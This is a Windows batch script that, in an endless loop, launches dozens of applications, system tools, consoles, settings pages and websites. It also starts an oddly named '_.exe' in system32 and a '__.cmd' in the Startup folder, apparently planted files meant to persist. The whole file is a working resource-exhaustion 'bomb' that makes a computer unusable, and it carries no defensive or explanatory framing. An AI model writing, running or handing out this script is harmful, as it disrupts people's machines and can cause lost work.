echo off
cls
:loop
start "%windir%\system32\_.exe"
start "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\__.cmd"
start mspaint
start notepad
start msedge
start diskmgmt.msc
start ms-settings:accounts
start ms-settings:appfeatures
start ms-settings:network
start ms-settings:windowsupdate
start ms-gamingoverlay:///
start cmd
start regedit
start chrome.exe
start expand.exe
start gpedit.msc
start calc
start javac
start shell:common startup
start dwm.exe
start winver
start iexplore
start %windir%
start %systemroot%
start dism
start shell:sendto
start C:\Users\public\appdata\local\temp
start 7zfm
start https://www.google.com
start https://www.youtube.com
start http://www.microsoft.com
start http://www.docs.google.com
start splwow64.exe
start write.exe
start winhelp32.exe
start psr.exe
start VsGraphicsRemoteEngine.exe
start PresentationSettings.exe
start tree
start SpaceAgent.exe
start msinfo32.exe
start mstsc.exe
start msdt.exe
start mobsync.exe
start credwiz.exe
start mighost.exe 
start Fondue.exe
start OptionalFeatures.exe
start mblctr.exe
start isoburn.exe
start IMTCLNWZ.EXE
start IMTCPROP.EXE
start ChsIME.exe
start IMJPSET.EXE
start IMJPUEX.EXE
start IMJPDCT.EXE
start IMCCPHR.exe
start IMESEARCH.EXE
start IMEPADSV.EXE
start IMEWDBLD.EXE
start imecfmui.exe
start eudcedit.exe
start Dxpserver.exe
start charmap.exe
start DevicePairingWizard.exe
start ComputerDefaults.exe
start cleanmgr.exe
start taskmgr.exe
start OpenWith.exe
start wscript.exe
start cscript.exe
start ntprint.exe
start UserAccountControlSettings.exe
start VoiceAccess.exe
start EaseOfAccessDialog.exe
start sethc.exe
start osk.exe
start Narrator.exe
start Magnify.exe
start LiveCaptions.exe
start wksprt.exe
start fontview.exe
start MRT.exe
start msedgewebview2.exe
start msconfig.exe
start PING.exe
start mmc.exe
start iscsicli.exe
start mshta.exe
start dialer.exe
start dvdplay.exe
start OneDriveSetup.exe
start whoami.exe
start calc.exe
start dialer.exe
start IEChooser.exe
start dxdiag.exe
start control.exe
start powershell_ise.exe
goto loop